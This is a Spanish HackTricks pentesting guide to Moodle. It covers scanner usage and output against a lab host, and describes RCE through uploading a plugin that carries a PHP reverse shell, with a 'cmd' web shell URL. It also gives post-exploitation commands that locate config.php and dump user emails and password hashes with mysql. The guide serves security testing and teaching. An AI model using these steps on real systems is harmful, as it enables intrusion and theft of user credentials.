hacktricks/network-services-pentesting/pentesting-web/moodle.md

12 KiB

Moodle

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

Si estás interesado en una carrera de hacking y hackear lo imposible - ¡estamos contratando! (se requiere fluidez en polaco escrito y hablado).

{% embed url="https://www.stmcyber.com/careers" %}

Escaneos automáticos

droopescan

pip3 install droopescan
droopescan scan moodle -u http://moodle.example.com/<moodle_path>/

[+] Plugins found:
forum http://moodle.schooled.htb/moodle/mod/forum/
http://moodle.schooled.htb/moodle/mod/forum/upgrade.txt
http://moodle.schooled.htb/moodle/mod/forum/version.php

[+] No themes found.

[+] Possible version(s):
3.10.0-beta

[+] Possible interesting urls found:
Static readme file. - http://moodle.schooled.htb/moodle/README.txt
Admin panel - http://moodle.schooled.htb/moodle/login/

[+] Scan finished (0:00:05.643539 elapsed)

El comando moodlescan es una herramienta de escaneo de seguridad diseñada específicamente para Moodle, una plataforma de aprendizaje en línea. Esta herramienta se utiliza para identificar posibles vulnerabilidades en una instalación de Moodle y proporciona información detallada sobre los riesgos de seguridad.

El comando moodlescan se ejecuta desde la línea de comandos y acepta varios parámetros para personalizar el escaneo. Algunas de las características clave de moodlescan incluyen:

  • Escaneo de versiones de Moodle: moodlescan puede identificar la versión exacta de Moodle que se está ejecutando en un sitio web. Esto es útil para determinar si una instalación de Moodle está actualizada y si se han corregido las vulnerabilidades conocidas en versiones anteriores.

  • Escaneo de plugins: moodlescan puede analizar los plugins instalados en un sitio de Moodle y verificar si hay vulnerabilidades conocidas en ellos. Esto es importante, ya que los plugins pueden introducir nuevas vulnerabilidades en una instalación de Moodle.

  • Escaneo de configuración: moodlescan también puede analizar la configuración de Moodle en busca de posibles problemas de seguridad. Esto incluye la verificación de la configuración de autenticación, la configuración de permisos y otras configuraciones relacionadas con la seguridad.

Es importante destacar que moodlescan es una herramienta de escaneo de seguridad y no debe utilizarse para fines maliciosos. Su objetivo es ayudar a los administradores de Moodle a identificar y corregir posibles vulnerabilidades en sus instalaciones.

#Install from https://github.com/inc0d3/moodlescan
python3 moodlescan.py -k -u http://moodle.example.com/<moodle_path>/

Version 0.7 - Dic/2020
.............................................................................................................

By Victor Herrera - supported by www.incode.cl

.............................................................................................................

Getting server information http://moodle.schooled.htb/moodle/ ...

server         	: Apache/2.4.46 (FreeBSD) PHP/7.4.15
x-powered-by   	: PHP/7.4.15
x-frame-options	: sameorigin
last-modified  	: Wed, 07 Apr 2021 21:33:41 GMT

Getting moodle version...

Version found via /admin/tool/lp/tests/behat/course_competencies.feature : Moodle v3.9.0-beta

Searching vulnerabilities...


Vulnerabilities found: 0

Scan completed.

CMSMap

CMSMap es una herramienta de código abierto que se utiliza para escanear y enumerar los sistemas de gestión de contenido (CMS) en un sitio web. Esta herramienta es útil durante las pruebas de penetración para identificar el CMS utilizado por un sitio web y obtener información sobre las vulnerabilidades conocidas asociadas con ese CMS en particular.

Características principales de CMSMap:

  • Escaneo de CMS: CMSMap puede escanear un sitio web en busca de CMS populares como WordPress, Joomla, Drupal, etc. Esto ayuda a los pentesters a identificar rápidamente el CMS utilizado por el sitio web objetivo.

  • Enumeración de usuarios: CMSMap puede enumerar los usuarios registrados en un sitio web basado en CMS. Esto puede ser útil para identificar posibles cuentas de administrador o usuarios con privilegios especiales.

  • Enumeración de plugins y temas: CMSMap puede enumerar los plugins y temas instalados en un sitio web basado en CMS. Esto proporciona información adicional sobre las funcionalidades y configuraciones del sitio web.

  • Enumeración de vulnerabilidades conocidas: CMSMap puede buscar vulnerabilidades conocidas asociadas con el CMS utilizado por el sitio web. Esto ayuda a los pentesters a identificar posibles puntos débiles y explotarlos durante las pruebas de penetración.

  • Escaneo de directorios y archivos: CMSMap puede realizar un escaneo de directorios y archivos en un sitio web basado en CMS. Esto puede revelar información sensible o archivos confidenciales que podrían ser explotados por un atacante.

CMSMap es una herramienta poderosa que puede ayudar a los pentesters a identificar y explotar vulnerabilidades en los sistemas de gestión de contenido. Sin embargo, es importante utilizar esta herramienta de manera ética y obtener el permiso adecuado antes de realizar pruebas de penetración en un sitio web.

pip3 install git+https://github.com/dionach/CMSmap.git
cmsmap http://moodle.example.com/<moodle_path>

CVEs

Encontré que las herramientas automáticas son bastante inútiles para encontrar vulnerabilidades que afecten a la versión de Moodle. Puedes verificar esto en https://snyk.io/vuln/composer:moodle%2Fmoodle

RCE

Necesitas tener el rol de gerente y puedes instalar complementos dentro de la pestaña de "Administración del sitio":

Si eres gerente, es posible que aún necesites activar esta opción. Puedes ver cómo hacerlo en la prueba de concepto de escalada de privilegios de Moodle: https://github.com/HoangKien1020/CVE-2020-14321.

Luego, puedes instalar el siguiente complemento que contiene el clásico shell reverso en PHP de pentest-monkey (antes de subirlo, debes descomprimirlo, cambiar la IP y el puerto del revshell y comprimirlo nuevamente)

{% file src="../../.gitbook/assets/moodle-rce-plugin.zip" %}

O puedes usar el complemento de https://github.com/HoangKien1020/Moodle_RCE para obtener un shell PHP regular con el parámetro "cmd".

Para acceder y lanzar el complemento malicioso, debes acceder a:

http://domain.com/<moodle_path>/blocks/rce/lang/en/block_rce.php?cmd=id

POST

Encontrar credenciales de la base de datos

find / -name "config.php" 2>/dev/null | grep "moodle/config.php"

Volcar credenciales de la base de datos

Para realizar una prueba de penetración en un sitio web Moodle, es posible que desees extraer las credenciales de la base de datos. Esto te permitirá obtener información de inicio de sesión de los usuarios y potencialmente acceder a sus cuentas.

Aquí hay algunos pasos que puedes seguir para volcar las credenciales de la base de datos:

  1. Enumeración de la base de datos: Utiliza técnicas de enumeración para identificar el tipo de base de datos utilizada por Moodle. Esto te ayudará a seleccionar las herramientas y comandos adecuados para extraer las credenciales.

  2. Escaneo de puertos: Realiza un escaneo de puertos para identificar los servicios y puertos abiertos en el servidor Moodle. Esto te ayudará a determinar si hay algún servicio de base de datos en ejecución.

  3. Identificación de credenciales de conexión: Busca en los archivos de configuración de Moodle para encontrar las credenciales de conexión a la base de datos. Estos archivos pueden contener información como el nombre de usuario y la contraseña utilizados para acceder a la base de datos.

  4. Extracción de credenciales: Utiliza herramientas como mysqldump o pg_dump para extraer las credenciales de la base de datos. Estas herramientas te permitirán realizar una copia de seguridad de la base de datos y guardarla en un archivo.

Recuerda que realizar pruebas de penetración sin el consentimiento explícito del propietario del sitio web es ilegal y puede tener consecuencias legales graves. Siempre asegúrate de obtener el permiso adecuado antes de realizar cualquier prueba de penetración.

/usr/local/bin/mysql -u <username> --password=<password> -e "use moodle; select email,username,password from mdl_user; exit"

Si estás interesado en una carrera de hacking y hackear lo inhackeable - ¡estamos contratando! (se requiere fluidez en polaco escrito y hablado).

{% embed url="https://www.stmcyber.com/careers" %}

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥